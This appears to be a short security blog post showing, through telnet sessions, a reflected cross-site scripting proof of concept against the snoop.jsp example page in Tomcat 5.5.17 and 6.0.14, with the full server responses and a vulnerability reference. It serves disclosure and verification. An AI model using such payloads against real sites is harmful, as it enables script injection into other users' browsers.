Security Professional - Paul Jang

■Tomcat 5.5.17

$ telnet localhost 80

Trying 10.97.167.68...

Connected to localhost.

Escape character is '^]'.

GET /jsp-examples/snp/snoop.jsp;<script>alert(document.domain)</script> HTTP/1.0

HTTP/1.1 200 OK

Set-Cookie: JSESSIONID=8E40080E6A00556AD4FDA7620ADD81E6; Path=/jsp-examples

Content-Type: text/html

Content-Length: 1269

Date: Mon, 04 Feb 2008 12:55:54 GMT

Server: Apache-Coyote/1.1

Connection: close

<html>

<!--

  Copyright 2004 The Apache Software Foundation

  Licensed under the Apache License, Version 2.0 (the "License");

  you may not use this file except in compliance with the License.

  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software

  distributed under the License is distributed on an "AS IS" BASIS,

  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.

  See the License for the specific language governing permissions and

  limitations under the License.

-->

<body bgcolor="white">

<h1> Request Information </h1>

<font size="4">

JSP Request Method: GET

<br>

Request URI: /jsp-examples/snp/snoop.jsp;<script>alert(document.domain)</script>

<br>

Request Protocol: HTTP/1.0

<br>

Servlet path: /snp/snoop.jsp

<br>

Path info: null

<br>

Query string: null

<br>

Content length: -1

<br>

Content type: null

<br>

Server name: 10.97.167.68

<br>

Server port: 80

<br>

Remote user: null

<br>

Remote address: 10.97.167.44

<br>

Remote host: 10.97.167.44

<br>

Authorization scheme: null

<br>

Locale: zh_TW

<hr>

The browser you are using is null

<hr>

</font>

</body>

</html>

Connection closed by foreign host.

$

■Tomcat6.0.14

$ telnet 10.97.167.68 8080

Trying 10.97.167.68...

Connected to 10.97.167.68.

Escape character is '^]'.

GET /examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script> HTTP/1.0

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Set-Cookie: JSESSIONID=1295AD920974F92E4C5E7F1F7CAA5481; Path=/examples

Content-Type: text/html

Content-Length: 1469

Date: Sun, 03 Feb 2008 15:11:02 GMT

Connection: close

<html>

<!--

 Licensed to the Apache Software Foundation (ASF) under one or more

  contributor license agreements.  See the NOTICE file distributed with

  this work for additional information regarding copyright ownership.

  The ASF licenses this file to You under the Apache License, Version 2.0

  (the "License"); you may not use this file except in compliance with

  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software

  distributed under the License is distributed on an "AS IS" BASIS,

  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.

  See the License for the specific language governing permissions and

  limitations under the License.

-->

<body bgcolor="white">

<h1> Request Information </h1>

<font size="4">

JSP Request Method: GET

<br>

Request URI: /examples/jsp/snp/snoop.jsp;&lt;script&gt;alert(document.domain)&lt;/script&gt;

<br>

Request Protocol: HTTP/1.0

<br>

Servlet path: /jsp/snp/snoop.jsp

<br>

Path info: null

<br>

Query string: null

<br>

Content length: -1

<br>

Content type: null

<br>

Server name: 10.97.167.68

<br>

Server port: 8080

<br>

Remote user: null

<br>

Remote address: 10.97.167.44

<br>

Remote host: 10.97.167.44

<br>

Authorization scheme: null

<br>

Locale: en_US

<hr>

The browser you are using is

null

<hr>

</font>

</body>

</html>

Connection closed by foreign host.

$

■参照URL

http://www.securityfocus.com/bid/24476/info